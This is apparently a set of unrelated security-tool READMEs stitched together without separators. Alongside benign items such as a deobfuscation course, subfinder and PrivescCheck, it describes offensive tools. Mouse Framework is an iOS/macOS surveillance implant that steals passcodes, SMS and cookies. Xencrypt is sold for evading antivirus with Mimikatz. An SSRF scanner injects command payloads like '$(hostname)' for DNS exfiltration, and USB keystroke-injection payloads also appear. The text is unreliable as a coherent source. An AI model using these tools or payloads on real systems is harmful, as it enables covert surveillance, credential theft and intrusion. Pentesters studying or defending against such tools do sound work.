Advanced Binary Deobfuscation This repository contains the course materials of Advanced Binary Deobfuscation at the Global Cybersecurity Camp (GCC) Tokyo in 2020.
Course Abstract Reverse engineering is not easy, especially if a binary code is obfuscated. Once obfuscation performed, the binary would not be analyzed accurately with naive techniques alone. In this course, you will learn obfuscation principles (especially used by malware), theory and practice of obfuscated code analysis, and how to write your own tool for deobfuscation. In particular, we delve into data-flow analysis and SAT/SMT-based binary analysis (e.g., symbolic execution) to render obfuscation ineffective. Outline This course is about binary deobfuscation, meant for security analysts and researchers (in embryo) looking to add a skill set on writing your own tool to their arsenal. At the end of this class, attendees will be able to:
Have an in-depth understanding of theory, practice, and behind insights of obfuscation
Build a custom obfuscated payload with state-of-the-art packers
Apply compiler optimization techniques to binary analysis tasks
Design and implement automated binary analysis tools top on a symbolic execution engine
Even analyze obfuscated malware used in the APT campaign
Towards this end, the course was held in the form of a combination of classroom learning and hands-on training at GCC.
Prerequisite Knowledge Attendees should have:
Robust skill set in x86/x64 architecture
Basic experience with C/C++ and Python
Basic understanding of low-level CS (e.g., OSs, Compilers, interpreters, linkers, and loaders)
Capture items (unique requests) from the Burp Suite tools (Proxy, Repeater, Target). Request unique key is defined as follows: target (host, port, protocol), path and method.
Items have following editable properties:
comment
status (Blocked, Done, Ignored, In progress, New, Postponed)
tags
Items can be filtered by:
status
tags (there are two filtering modes: AND - item has to have all filtering tags OR - item has to have at least one of the filtering tags)
Exclude requests from capture based on the path extension or response status code
Selected items can be sent to the Burp Suite tools: Intruder, Repeater or Scanner
Selected item is displayed in the full functional Burp Suite HTTP message editor
Path patterns - unique key of the request is defined by target, path and method. However it can be usefull to define path pattern (regexp) to consider different requests as the same item (e.g. /article/\d+?/comments path pattern groups following requests: /article/1/comments, /article/2/comments, /article/100/comments, etc.)
Optionally, items and path patterns can be persisted to keep the state between Burp Suite runnings (please see Requirements)
Options
Database - selects file to persist items and path patterns (please see Requirements)
Scope tools - enables items capturing for selected Burp Suite tools (Proxy, Repeater, Target)
Excluded extensions - requests with these path extensions won't be processed
Excluded status codes - responses (and related requests) with these status codes won't be processed
Overwrite duplicate items - the current item will be replaced by the newest duplicate (state of the item is preserved)
Process only in-scope requests
Set In progress status when sending item to tool
Requirements To persist items and path patterns SQLite JDBC driver is required.
Running CTFs and Security Trainings with OWASP Juice Shop is usually quite tricky, Juice Shop just isn't intended to be used by multiple users at a time. Instructing everybody how to start Juice Shop on their own machine works ok, but takes away too much valuable time. MultiJuicer gives you the ability to run separate Juice Shop instances for every participant on a central kubernetes cluster, to run events without the need for local Juice Shop instances.
Note: This project was called JuicyCTF until recently. This was changed to avoid confusions with the juice-shop-ctf project.
What it does:
dynamically create new Juice Shop instances when needed
runs on a single domain, comes with a LoadBalancer sending the traffic to the participants Juice Shop instance
backup and auto apply challenge progress in case of Juice Shop container restarts
# for helm <= 2 helm install multi-juicer/multi-juicer --name multi-juicer
# for helm >= 3 helm install multi-juicer multi-juicer/multi-juicer
Installation Guides for specific Cloud Providers Generally MultiJuicer runs on pretty much any kubernetes cluster, but to make it easier for anybody who is new to kubernetes we got some guides on how to setup a kubernetes cluster with MultiJuicer installed for some specific Cloud providers.
Customizing the Setup You got some options on how to setup the stack, with some option to customize the JuiceShop instances to your own liking. You can find the default config values under: helm/multi-juicer/values.yaml Download & Save the file and tell helm to use your config file over the default by running:
How much compute resources will the cluster require? To be on the safe side calculate with:
1GB memory & 1CPU overhead, for the balancer, redis & co
200MB & 0.2CPU * number of participants, for the individual JuiceShop Instances
The numbers above reflect the default resource limits. These can be tweaked, see: Customizing the Setup
How many users can MultiJuicer handle? There is no real fixed limit. (Even thought you can configure one ) The custom LoadBalancer, through which all traffic for the individual Instances flows, can be replicated as much as you'd like. You can also attach a Horizontal Pod Autoscaler to automatically scale the LoadBalancer. When scaling up, also keep an eye on the redis instance. Make sure it is still able to handle the load.
Why a custom LoadBalancer? There are some special requirements which we didn't find to be easily solved with any pre build load balancer:
Restricting the number of users for a deployment to only the members of a certain team.
The load balancers cookie must be save and not easy to spoof to access another instance.
Handling starting of new instances.
If you have awesome ideas on how to overcome these issues without a custom load balancer, please write us, we'd love to hear from you!
Why a separate kubernetes deployment for every team? There are some pretty good reasons for this:
The ability delete the instances of a team separately. Scaling down safely, without removing instances of active teams, is really tricky with a scaled deployment. You can only choose the desired scale not which pods to keep and which to throw away.
To ensure that pods are still properly associated with teams after a pod gets recreated. This is a non problem with separate deployment and really hard with scaled deployments.
The ability to embed the team name in the deployment name. This seems like a stupid reason but make debugging SOOO much easier, with just using kubectl.
Mouse Framework is an iOS and macOS post exploitation surveillance framework that gives you a command line session with extra functionality between you and a target machine using only a simple Mouse Payload. Mouse gives you the power and convenience of uploading and downloading files, tab completion, taking pictures, location tracking, shell command execution, escalating privileges, password retrieval, and much more.
Getting started
Mouse installation
cd mouse
chmod +x install.sh
./install.sh
Mouse uninstallation
cd mouse
chmod +x uninstall.sh
./uninstall.sh
Mouse Framework execution
To execute Mouse Framework you should execute the following command.
Mouse Payloads are intended to get remote target machine session.
Bourne-Again Shell payload
Selecting Bourne-Again Shell payload from the payload menu will give us a 1 liner that establishes a remote Mouse session upon execution on the target machine.
Platform: iOS/macOS
Teensy macOS payload (USB injection)
Teensy is a development USB board that can be programmed with the Arduino IDE. It emulates usb keyboard strokes extremely fast and can inject the Mouse payload just in a few seconds!
Platform: macOS
Rubber Duck payload (USB injection)
USB Rubber Duck is a development USB board that can inject uploaded to duck SD card inject.bin payload in a few seconds!
Platform: macOS
Application macOS payload
Selecting Application macOS from the payload menu will give you standart Mouse payload that converted to the macOS application.
The MultiHandler option lets us handler multiple sessions. You can choose to interact with different devices while listening for new connections in the background.
MultiHandler commands
close : Close active session. exit : Close all sessions and exit. help : Show all available commands. interact : Interact with a session. sessions : List active sessions.
Mouse Substrate
Mouse Substrate is a package that can be installed on the target iOS device after receiving remote control to run substrate commands and services.
Substrate commands
dhome : Simulate a double home button press. home : Simulate a home button press. locat : Toggle location services. mute : Update and view mute status.
After a session is established, we can execute commands on that device through the Mouse CLI. We can show all available commands by typing "help". Mouse CLI allows you to control a remote device. Remote device can be controlled by Mouse CLI commands. You can explore list of available Mouse CLI commands bellow.
getpaste : Get pasteboard contents. getvol : Get speaker output volume. idletime : Get the amount of user activity time. setbright : Set screen brightness. setvol : Set output volume.
iOS
battery : Get battery level. getvol : Get volume level. msub : Mouse Substrate. setvol : Set output volume. sysinfo : Show system information.
alert : Make alert show up on device. chwall : Change desktop wallpaper. close : Close application. imessage : Send message through the messages app. itunes : Control iTunes player. keyboard : Control keyboard. open : Open application. say : Convert text to speach.
iOS
alert : Make alert show up on device. dial : Dial a phone number. ipod : Control music player. kill : Terminate or signal a process. killall : Kill process by name. lastapp : Open last opened application. open : Open application. openurl : Open URL on device. say : Convert text to speach. vibrate : Vibrate device.
download : Download remote file. getfacebook : Retrieve facebook session cookies. mic : Record mic sound. picture : Take picture through iSight. prompt : Prompt user to type password. screenshot : Take screenshot.
iOS
download : Download remote file. getcontacts : Download addressbook. getnotes : Download notes. getpasscode : Retreive the device passcode. getsms : Download SMS data. locate : Get device location coordinates. mic : Record mic sound. picture : Take picture through the camera.
Boot commands
macOS
reboot : Reboot device. sleep : Put device into sleep mode. suspend : Suspend current session.
iOS
reboot : Reboot device. respring : Restart SpringBoard. safemode : Put device into SafeMode.
icons : List system alert icons. pid : Get Mouse process ID. shell : Open target device shell. su : Login as root. upload : Upload local file.
iOS
bundleids : List bundle identifiers. islocked : Check if the device is locked. pid : Get Mouse process ID. shell : Open target device shell. upload : Upload local file.
Mouse Framework disclaimer
Usage of the Mouse Framework for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state, federal, and international laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program.
PolyShell is a script that's simultaneously valid in Bash, Windows Batch, and PowerShell (i.e. a polyglot). This makes PolyShell a useful template for penetration testing as it can be executed on most systems without the need for target-specific payloads. PolyShell is also specifically designed to be deliverable via input injection using a USB Rubby Ducky, MalDuino, or similar device.
Copy/rename the script so it has the correct file extension (.sh, .bat, or .ps1).
Run the script with a Unix shell, as a batch file, or with PowerShell.
Using input injection
Open a terminal on the target machine.
Run the payload.
Press Ctrl-C, then run exit.
The input injection method will behave slightly differently than the script method. When run as a script, the payload will exit immediately once a language has been processed. When delivered via injection, the payload runs a read loop instead. Without it, the payload would close the terminal window but continue typing into an unknown window instead. The Ctrl-C breaks the script out of the read loop, allowing it run without unintended side-effects. Additionally, pasting the script into a terminal might fail. Once the script reaches the read loop, some terminals will treat the remaining pasted text as the read loop's input (good), but others may continue executing the script when the read loop exits (bad).
How It Works The main trick is to get each other language to "look away" when we want to run code specific to only one of them. This is accomplished by exploiting language quirks surrounding quoting, redirection, and comments. Consider the following line:
Each language sees the echo command, but will interpret the rest of the line differently. For example, this is what each language will interpret as a string:
After executing the line, the bash script will be in a here document, PowerShell script will be in a multiline-comment, and the batch script will continue executing normally. After each language is done executing, we terminate it. This prevents us from needing to work around its quirks later in the script.
Quirks Obviously, the tricks required to make this polyglot doesn't follow normal coding conventions. There are quite a few quirks that were leveraged or had to be worked around:
All three languages have different escape characters:
Bash: backslash (\)
Batch: caret (^)
PowerShell: backtick (`)
Escape characters work inside Bash and PowerShell strings, but not batch strings.
Redirects (i.e. < and >) have special meaning in all three languages unless quoted.
Redirects don't have to be at the end of a command.
This is valid Bash/Batch/PowerShell: echo >output.txt "Hello World"
Batch is the only language without multi-line strings or comments.
Batch treats > as a redirect even when it directly touches a string, but PowerShell doesn't.
Batch script GOTO statements only work when run as a script, not when run interactively.
PowerShell's multi-line comment (<#) must be immediately preceded by whitespace.
Bash's here documents may begin anywhere so long as it's unquoted and not a comment.
This tool search for SSRF using predefined settings in different parts of a request (path, host, headers, post and get parameters).
First step Rename example.app-settings.conf to app-settings.conf and adjust settings. The most important setting is the callback url. I recommend to use burp collaborator. Then you can add your urls to config/url-to-test.txt. Here the script accepts domains as well as urls with path and queryparameters. If you like you can add your own cookies to config/cookie-jar.txt and add additional headers for your requests. The brute force list which is used in post and get requests is currently small, I dont thing adding 2000 parameters is smart. We should focus on those which have the highest possibility to be vulnerable. If you don't think so: just add your own! Execution This tool does not expect any argument via CLI, so just type:
python3 extended-ssrf-search.py
Configuration Its possible to set a lot of options and settings, so here are some explanations.
Files The main config file is the "app-settings.conf", everything has to be done in that file! Besides that, there are some other files which allow to set more complex data like headers, urls and cookies. config/cookie-jar.txt Use this file to add a cookie string. I usually copy the one which you can see in every burp request. Please just copy the value of the "Cookie:"-header. A sample input is in the default file. config/http-headers.txt This file defines the http headers which are added to the request and manipulated (payload is added to each one). The most important ones are already in the file. But feel free to add more. config/parameters.txt The tool has the option to brute force get and post parameters. In that case those parameters (+ those in the query string) will be used. Each parameter gets the payload as value. Most important are already in that file. config/static-request-headers.txt Those headers are added to every request, but they won't get manipulated. They are static. Thats the best place to add authorization or bearer cookies. One (Key: Value) per line! config/urls-to-test.txt Thats the file you need! Please add here your links to scan. The following formats are allowed:
When the last case is detected an "http://" is prepended. This tool is intended to work with a good list of urls. A good way to get one is to just export it using burp. Then you have a valid list of urls. All you need to do ist to just add your cookies.
Settings The app-settings.conf defines the program workflow. Its the most important file, you can activate/deactive different modules there.
Basic settings CallbackHost The url/host which all dns and http requests are send back - I mostly use burp collaborator here, but DNSBin or you own server is also perfect. HTTPMethod Defines the request method. Valid options are: GET, POST, PUT, DELETE, PATCH, GET, OPTIONS Invalid values will produce massiv errors since http.client disallows other methods! I dont check if you did something wrong here ;) HTTPTimeout Some requests can take long. Here you can define the max. execution time of one request. I recommend values between 2 and 6 seconds. MaxThreads The more threads, the faster the script is - but since we are dealing with a lot of connections I usually keep this below 10 on my personal computer and arround 30 on my VPS. ShuffleTests Especially when dealing with a BIG list of urls having this set to "true" will shuffle all created tests. That way the same host will not get hit that much. If you scan just one host, than it doesn't matter. GetChunkSize When working with bigger param lists this might be handy and prevent 400 too large entity errors.
Insertion points Each insertion point can be activated (set to true/1) or deactivated (set to false/0) InPath The example shows a GET request, but depending on your settings, this could also be POST, PUT, DELETE, ...
GET [INJECT HERE PAYLOAD] HTTP/1.1 ...
InHost The example shows a GET request, but depending on your settings, this could also be POST, PUT, DELETE, ...
GET /path HTTP/1.1 Host: [INJECT HERE PAYLOAD] ...
InAdditionalHeaders The example shows a GET request, but depending on your settings, this could also be POST, PUT, DELETE, ...
GET /path HTTP/1.1 ... X-Forwarded-For: [INJECT HERE PAYLOAD]
InParamsGet Here the Method is fixed to GET.
GET /path?[INJECT HERE PAYLOAD] HTTP/1.1 ...
InParamsPost Here the Method is fixed to POST.
POST /path HTTP/1.1 ... Content-Type: application/x-www-form-urlencoded Content-Length: XXX
[INJECT HERE PAYLOAD]
InParamsPostAsJson Here the Method is fixed to POST.
POST /path HTTP/1.1 ... Content-Type: application/json Content-Length: XXX
[INJECT HERE JSON-PAYLOAD]
Attacks In the default settings this tool just tries to trigger http requests via SSRF. But its also possible to exfiltrate data using DNS, when an OS command is injected. The most common payload is "$(hostname)". There are some options which allow to use this kind of attack additionally. UseExecPayload Using this setting you can activate/deactivate that behaviour. ExecPayload Here you can define your own payload, e.g. $(uname -a)
Identifier To make the identification a little bit easier a combination of current host and method (in short form, see Tests.py) is appended or prepended to the payload. Position Valid options are "append" and "prepend"! If "append" is chosen, the payloads look like this:
Tunneling Its also possible to use a tunnel, e.g. "127.0.0.1:8080" (Burp Proxy), to monitor all traffic within Burp. Active Setting this to "true" will force the script to use a tunneled connection. Tunnel Set here your proxy server "ip:port". The result is the following one, when you open Burp you can watch your http history:
subfinder is a subdomain discovery tool that discovers valid subdomains for websites by using passive online sources. It has a simple modular architecture and is optimized for speed. subfinder is built for doing one thing only - passive subdomain enumeration, and it does that very well. We have designed subfinder to comply with all passive sources licenses, and usage restrictions, as well as maintained a consistently passive model to make it useful to both penetration testers and bug bounty hunters alike. Features
Simple and modular code base making it easy to contribute.
Fast And Powerful Resolution and wildcard elimination module
Curated passive sources to maximize results (26 Sources as of now)
Directory to write enumeration results to (optional)
subfinder -oD ~/outputs
-oI
Write output in Host,IP format
subfinder -oI
-oJ
Write output in JSON lines Format
subfinder -oJ
-r
Comma-separated list of resolvers to use
subfinder -r 1.1.1.1,1.0.0.1
-rL
Text file containing list of resolvers to use
subfinder -rL resolvers.txt
-silent
Show only subdomains in output
subfinder -silent
-sources
Comma separated list of sources to use
subfinder -sources shodan,censys
-t
Number of concurrent goroutines for resolving (default 10)
subfinder -t 100
-timeout
Seconds to wait before timing out (default 30)
subfinder -timeout 30
-v
Show Verbose output
subfinder -v
-version
Show current program version
subfinder -version
Installation Instructions
Direct Installation
subfinder requires go1.13+ to install successfully ! The installation is easy. You can download the pre-built binaries for different platforms from the Releases page. Extract them using tar, move it to your $PATH and you're ready to go.
> tar -xzvf subfinder-linux-amd64.tar > mv subfinder-linux-amd64 /usr/bin/subfinder > subfinder
If you want to build it yourself, you can go get the repo
go get -v github.com/projectdiscovery/subfinder/cmd/subfinder
Upgrading If you wish to upgrade the package you can use:
go get -u -v github.com/projectdiscovery/subfinder/cmd/subfinder
Running in a Docker Container You can use the official dockerhub image at subfinder. Simply run -
> docker pull ice3man/subfinder
The above command will pull the latest tagged release from the dockerhub repository. If you want to build the container yourself manually, git clone the repo, then build and run the following commands
Clone the repo using git clone https://github.com/projectdiscovery/subfinder.git
Build your docker container
docker build -t ice3man/subfinder .
After building the container using either way, run the following -
docker run -it ice3man/subfinder
The above command is the same as running -h
For example, this runs the tool against uber.com and output the results to your host file system:
docker run -v $HOME/.config/subfinder:/root/.config/subfinder -it ice3man/subfinder -d uber.com > uber.com.txt
Post Installation Instructions Subfinder will work after using the installation instructions however to configure Subfinder to work with certain services, you will need to have setup API keys. The following services do not work without an API key:
Theses values are stored in the $HOME/.config/subfinder/config.yaml file which will be created when you run the tool for the first time. The configuration file uses the YAML format. Multiple API keys can be specified for each of these services from which one of them will be used for enumeration. For sources that require multiple keys, namely Censys, Passivetotal, they can be added by separating them via a colon (:). An example config file -
If you are using docker, you need to first create your directory structure holding subfinder configuration file. After modifying the default config.yaml file, you can run:
After that, you can pass it as a volume using the following sample command.
> docker run -v $HOME/.config/subfinder:/root/.config/subfinder -it ice3man/subfinder -d freelancer.com
Running Subfinder To run the tool on a target, just use the following command.
> subfinder -d freelancer.com
This will run the tool against freelancer.com. There are a number of configuration options that you can pass along with this command. The verbose switch (-v) can be used to display verbose information.
The -o command can be used to specify an output file.
> subfinder -d freelancer.com -o output.txt
To run the tool on a list of domains, -dL option can be used. This requires a directory to write the output files. Subdomains for each domain from the list are written in a text file in the directory specified by the -oD flag with their name being the domain name.
> cat domains.txt hackerone.com google.com
> subfinder -dL domains.txt -oD ~/path/to/output > ls ~/path/to/output
hackerone.com.txt google.com.txt
If you want to save results to a single file while using a domain list, specify the -o flag with the name of the output file.
> cat domains.txt hackerone.com google.com
> subfinder -dL domains.txt -o ~/path/to/output.txt > ls ~/path/to/
output.txt
You can also get output in json format using -oJ switch. This switch saves the output in the JSON lines format. If you use the JSON format, or the Host:IP format, then it becomes mandatory for you to use the -nW format as resolving is essential for these output format. By default, resolving the found subdomains is disabled.
The new highlight of this release is the addition of stdin/stdout features. Now, domains can be piped to subfinder and enumeration can be ran on them. For example -
The subdomains discovered can be piped to other tools too. For example, you can pipe the subdomains discovered by subfinder to the awesome httprobe tool by @tomnomnom which will then find running http servers on the host.
Tired of wasting lots of time obfuscating PowerShell scripts like invoke-mimikatz only to have them get detected anyway? Wouldn't it be awesome if you could take any script and automatically and with almost no effort generate a near-infinite amount of variants in order to defeat signature-based antivirus detection mechanisms? WELL, NOW YOU CAN! For the low low price of free! Xencrypt is a PowerShell crypter that uses AES encryption and Gzip/DEFLATE compression to with every invocation generate a completely unique yet functionally equivalent output script given any input script. It does this by compressing and encrypting the input script and storing this data as a payload in a new script which will unencrypt and decompress the payload before running it. In essence, it is to PowerShell what a PE crypter is.
You will now have an encrypted xenmimi.ps1 file in your current working directory. You can use it in the same way as you would the original script, so in this case:
Import-Module ./xenmimi.ps1 Invoke-Mimikatz
It also supports recursive layering via the -Iterations flag.
This will compress and encrypt it 100 times and is useful for dynamic AV bypasses because they have a time-out for analyzing code. There's no fakery here like sleeps that the dynamic scan can skip to get to the end -- it has to go through the entire chain to get to the malicious payload which it usually never does since they normally time out after a second or two or scanning. Warning though, the files can get big and generating the output file can take a very long time depending on the scripts and number of iterations requested.
Contributing If you want to contribute, feel free to contact on Twitter ( @SamuelAnttila ) or submit pull requests. Any and all ideas for improvements are welcome and you'll be credited appropriately, just please try to keep it to one file in order to make the tool easy to take with you in your kit.
BadBlood by Secframe fills a MicrosoftActive Directory Domain with a structure and thousands of objects. The output of the tool is a domain similar to a domain in the real world. After BadBlood is ran on a domain, security analysts and engineers can practice using tools to gain an understanding and prescribe to securing Active Directory. Each time this tool runs, it produces different results. The domain, users, groups, computers and permissions are different. Every. Single. Time.
# clone the repo git clone https://github.com/davidprowe/badblood.git #Run Invoke-badblood.ps1 ./badblood/invoke-badblood.ps1
Talk About the BadBlood
Message or Follow me on twitter @ davidprowe
Drop a note on secframe.com
I am not responsible for cleanup if this is run in a production domain
Disclaimer Please note: all tools/ scripts in this repo are released for use "AS IS" without any warranties of any kind, including, but not limited to their installation, use, or performance. We disclaim any and all warranties, either express or implied, including but not limited to any warranty of noninfringement, merchantability, and/ or fitness for a particular purpose. We do not warrant that the technology will meet your requirements, that the operation thereof will be uninterrupted or error-free, or that any errors will be corrected. Any use of these scripts and tools is at your own risk. There is no guarantee that they have been through thorough testing in a comparable environment and we are not responsible for any damage or data loss or time loss incurred with their use. You are responsible for reviewing and testing any scripts you run thoroughly before use in any non-testing environment. This tool is not designed for a production environment.
You can specify what ips should it resolve to and how many times, for now it only supports A records :( Then you can see where it was requested from, what did it resolve to,... in logs
How to run it First of all, check the configuration in .py files, it's usually marked by
""" *** CONFIG *** """
You also should not forget to change docker and redispasswords in
docker-compose.yml
app.py
dns_resources
#Set up postgres and redis sudo docker-compose up
#in ./BE pip3 install -r requirements.txt
python3 dns.py # to start the dns server
# for testing purposes development server is enough I think FLASK_APP=app.py FLASK_ENV=development flask run
# then in ./FE npm install npm start
Api documentation For api to work you will need to be signed in - API is using bearer tokens for authentication and Content-Type has to be set to application/json
Registration /auth/signup POST /auth/signupJSON body:
"name" is the name if the dns bin - it comes handy in frontend app
"ip_props" is where the magic happens
"somenumber" - these numbers have to be in order from 1 to how much you want (max 32), so no random numbers... the dns server will go from "1" and repeat the ip one after another as supplied, when it comes to the last ip, it will reset the counter and go from "1" again, if "4ever" is supplied in repeat field this loop will not continue and domain remains stuck on the 4ever IP
"ip" - this is the ip to resolve
"repeat" - how many times this ip should be resolved - this can be set to any positive integer or "4ever" to never stop resolving this ip after program gets to it
But there is one exception to this 4ever loop info about what was resolved and what should be resolved next is stored in redis with expiration set to 1 hour, so the domain will resolve to 1.1.1.1 again in 1 hour after creating it. You can change this setting in REDIS_EXP variable in dns.py and dns_resources.py
List all bins /api/fookup/listAll GET /api/fookup/listAll Response:
This will return all info about the dnsbin, you already are familiar with the ip_props and name part so i will explain that other stuff
"ip_to_resolve": number of ip the program should resolve to right now
"turn" - the number of times "ip_to_resolve" was already resolved so when turn == repeat, ip_to_resolve will become "2" and this will reset
All logs /api/fookup/logs/all This will return all logs from the all bins owned by user This can be a bit slow if you requested the domains 12321312 times GET /api/fookup/logs/all Response:
Statistics /api/statistics This just gets the statistics for the frontend app GET /api/statistics Response:
{ "request_count": 420, "created_bins": 69 }
PLEASE If you have a bit of free time, please contribute, it means a lot to me :D
TODO FE - create new token form FE - show error messages on screen FE - in /mybins add a brief overview of selected bin -DONE- API - shorten long uuid domains? - uuid4().hex -DONE- -DONE- DNS SERVER except - if invalid IP is supplied dont crash -DONE- FE+BE - pagination on logs FE - ability to specify 4ever into repeat field FE+BE - delete bin
WiFi Passview is an open source batch script based program that can recover your WiFi Password easily in seconds. This is for Windows OS only. Basically, this scripted program has the same function as other passview softwares such as webpassview and mailpassview. Disclaimer: WiFi Passview is NOT designed for malicious use! Please use this program responsibly! ZSecurity.org This project is posted on a cyber security educational website called zsecurity.org you should visit this project here for more information: https://zsecurity.org
How it Works Basically, this is the shortcut and batch scripted file version of a popular WiFi password manager viewing method using command prompt. This is how it works...
When you use this tool, you are able to extract the WiFi passwords stored on the target machine in just a seconds.
Features This simple tool offers you the following features...
Extract all available WiFi passwords stored in the target machine and can be done in just a seconds.
Extract password from specific target SSID.
Save extracted passwords.
Additional options.
No manual reading of Key Content, the tool will do that for you!
Standalone batch program.
Customizable.
Usage Download the repository and look for "wifi-passview-vX.X.X.bat" file and open it and run as administrator. All you have to do is to follow the on-screen instructions. Wanna use for WiFi Hacking? Visit this blog...
In Action Here's how this tool works...
Don't forget to like, share, and subscribe to my channel!
White Label / Personalize / Custom
Download the repository
Do "npm install" and "npm install gulp-cli -g && npm install gulp -D"
After that, edit the "./src/config.json" file for your customization or personalization.
When you think you are satisfy, just do "gulp build" or "gulp" to initiate the building process.
If you want to reset the building process just do "gulp cleandev".
Contributing Contributions are welcome, create a pull request to this repo and I will review your code.
Issues If you're facing a problem in using WiFi Passview please let me know by creating an issue in this github repository. I'm happy to help you! Don't forget to provide some screenshot or error logs of it!
To Do
Gulp Options
CI (Travis)
More... (have suggestions? let me know!)
Author This project is created by Waren Gonzaga for educational purposes.
Read Me Initially, you need to create a project where you will save everything. All of the collected information is saved as "project-name" in results directory. You can update user agent and proxy information in the settings section and also update url, proxy, project name, wordlist, thread numbers.
Features This tool include:
Dork Finder
Admin Panel Finder
Cms Finder
Ip History
Reverse Ip
Page Viewer
Proxy Finder
Installation
Installation with requirements.txt
git clone https://github.com/capture0x/XCTR-Hacking-Tools/ cd xctr-hacking-tools pip3 install -r requirements.txt
Usage
python3 xctr.py
All results save in results/project-name.
Dork Finder The dork finder have 2 section. Bing and yandex. e.g:
*.php?id=
Admin Panel Finder In this section, firstly need choose a wordlist for scanning. Press 2 to change wordlist and login. Url should be https://targetsite.com/ (http or s and / symbol at the end of the url.) If scanning is slow you will update the proxies.(Press 3 to update)
Cms Finder You'll find cms version from meta name.
Ip History This tool displays and save the ip history of the domain. e.g usage:
targetsite.com
Reverse Ip With this tool, you can find domains on server. e.g usage:
212.57.147.54
Page Viewer You can increase the number of page views of the target site. e.g usage:
https://targetsite.com
Proxy Finder This tool, find proxies on free-proxy-list.net and updates proxy.txt on main directory.
Known Issues --
Bugs and enhancements For bug reports or enhancements, please open an issue here.
Monitor twitter stream. TwitWork use the twitter stream which allows you to have a tweets in real-time. There is an input that allows you to filter the flow on one (or more) keywords or on an @ based on twitter tracking Demo This is a demo of export data on keyword "Coronavirius" https://twitwork.github.io/
This script aims to enumerate common Windows security misconfigurations which can be leveraged for privilege escalation and gather various information which might be useful for exploitation and/or post-exploitation. I built on the amazing work done by @harmj0y and @mattifestation in PowerUp. I added more checks and also tried to reduce the amount of false positives. It's still a Work-in-Progress because there are a few more checks I want to implement but it's already quite complete. If you have any suggestion (improvements, features), feel free to contact me on Twitter @itm4n. Usage Use the script from a PowerShell prompt.
Yet another Windows Privilege escalation tool, why? I really like PowerUp because it can enumerate common vulnerabilities very quickly and without using any third-party tools. The problem is that it hasn't been updated for several years now. The other issue I spotted quite a few times over the years is that it sometimes returns false positives which are quite confusing. Other tools exist on GitHub but they are not as complete or they have too many dependencies. For example, they rely on WMI calls or other command outputs. Therefore, I decided to make my own script with the following constraints in mind:
It must not use third-party tools such as accesschk.exe from SysInternals.
It must not use built-in Windows commands such as whoami.exe or netstat.exe. The reason for this is that I want my script to be able to run in environments where AppLocker (or any other Application Whitelisting solution) is enforced.
It must not use built-in Windows tools such as sc.exe or tasklist.exe because you'll often get an Access denied error if you try to use them on Windows Server 2016/2019 for instance.
It must not use WMI because its usage can be restricted to admin-only users.
Last but not least, it must be compatible with PowerShell Version 2.
Addressing all the constraints...
Third-party tools
I have no merit, I reused some of the code made by @harmj0y and @mattifestation. Indeed, PowerUp has a very powerfull function called Get-ModifiablePath which checks the ACL of a given file path to see if the current user has write permissions on the file or folder. I modified this function a bit to avoid some false positives though. Before that a service command line argument such as /svccould be identified as a vulnerable path because it was interpreted as C:\svc. My other contribution is that I made a registry-compatible version of this function (Get-ModifiableRegistryPath).
Windows built-in windows commands/tools
When possible, I naturally replaced them with built-in PowerShell commands such as Get-Process. In other cases, such as netstat.exe, you won't get as much information as you would with basic PowerShell commands. For example, with PowerShell, TCP/UDP listeners can easily be listed but there is no easy way to get the associated Process ID. In this case, I had to invoke Windows API functions.
WMI
You can get a looooot of information through WMI, that's great! But, if you face a properly hardened machine, the access to this interface will be restricted. So, I had to find workarounds. And here comes the Registry! Common checks are based on some registry keys but it has a lot more to offer. The best example is services. You can get all the information you need about every single service (except their current state obviously) simply by browsing the registry. This is a huge advantage compared to sc.exe or Get-Service which depend on the access to the Service Control Manager.
PowerShellv2 support
This wasn't that easy because newer version of PowerShell have very convenient functions or options. For example, the Get-LocalGroupfunction doesn't exist and Get-ChildItem doesn't have the -Depth option in PowerShellv2. So, you have to work your way around each one of these small but time-consuming issues.
Features
Current User
Invoke-UserCheck - Gets the usernane and SID of the current user Invoke-UserGroupsCheck - Enumerates groups the current user belongs to except default and low-privileged ones Invoke-UserPrivilegesCheck - Enumerates the high potential privileges of the current user's token
Services
Invoke-InstalledServicesCheck - Enumerates non-default services Invoke-ServicesPermissionsCheck - Enumerates the services the current user can modify through the service control manager Invoke-ServicesPermissionsRegistryCheck - Enumerates services that can be modified by the current user in the registry Invoke-ServicesImagePermissionsCheck - Enumerates all the services that have a modifiable binary (or argument) Invoke-ServicesUnquotedPathCheck - Enumerates services with an unquoted path that can be exploited
Dll Hijacking
Invoke-DllHijackingCheck - Checks whether any of the system path folders is modifiable
Programs
Invoke-InstalledProgramsCheck - Enumerates the applications that are not installed by default Invoke-ModifiableProgramsCheck - Enumerates applications which have a modifiable EXE of DLL file Invoke-RunningProcessCheck - Enumerates the running processes
Credentials
Invoke-SamBackupFilesCheck - Checks common locations for the SAM/SYSTEM backup files Invoke-UnattendFilesCheck - Enumerates Unattend files and extracts credentials Invoke-WinlogonCheck - Checks credentials stored in the Winlogon registry key Invoke-CredentialFilesCheck - Lists the Credential files that are stored in the current user AppData folders Invoke-VaultCredCheck - Enumerates credentials saved in the Credential Manager Invoke-VaultListCheck - Enumerates web credentials saved in the Credential Manager Invoke-GPPPasswordCheck - Lists Group Policy Preferences (GPP) containing a non-empty "cpassword" field
Registry
Invoke-UacCheck - Checks whether UAC (User Access Control) is enabled Invoke-LapsCheck - Checks whether LAPS (Local Admin Password Solution) is enabled Invoke-PowershellTranscriptionCheck - Checks whether PowerShell Transcription is configured/enabled Invoke-RegistryAlwaysInstallElevatedCheck - Checks whether the AlwaysInstallElevated key is set in the registry Invoke-LsaProtectionsCheck - Checks whether LSASS is running as a Protected Process (+ additional checks)
Network
Invoke-TcpEndpointsCheck - Enumerates unusual TCP endpoints on the local machine (IPv4 and IPv6) Invoke-UdpEndpointsCheck - Enumerates unusual UDP endpoints on the local machine (IPv4 and IPv6)
Misc
Invoke-WindowsUpdateCheck - Checks the last update time of the machine Invoke-SystemInfoCheck - Gets the name of the operating system and the full version string Invoke-LocalAdminGroupCheck - Enumerates the members of the default local admin group Invoke-MachineRoleCheck - Gets the role of the machine (workstation, server, domain controller) Invoke-SystemStartupHistoryCheck - Gets a list of system startup events Invoke-SystemStartupCheck - Gets the last system startup time Invoke-SystemDrivesCheck - Gets a list of local drives and network shares that are currently mapped
Phonia Toolkit is one of the most advanced toolkits to scan phone numbers using only free resources. The goal is to first gather standard information such as country, area, carrier and line type on any international phone numbers with a very good accuracy.
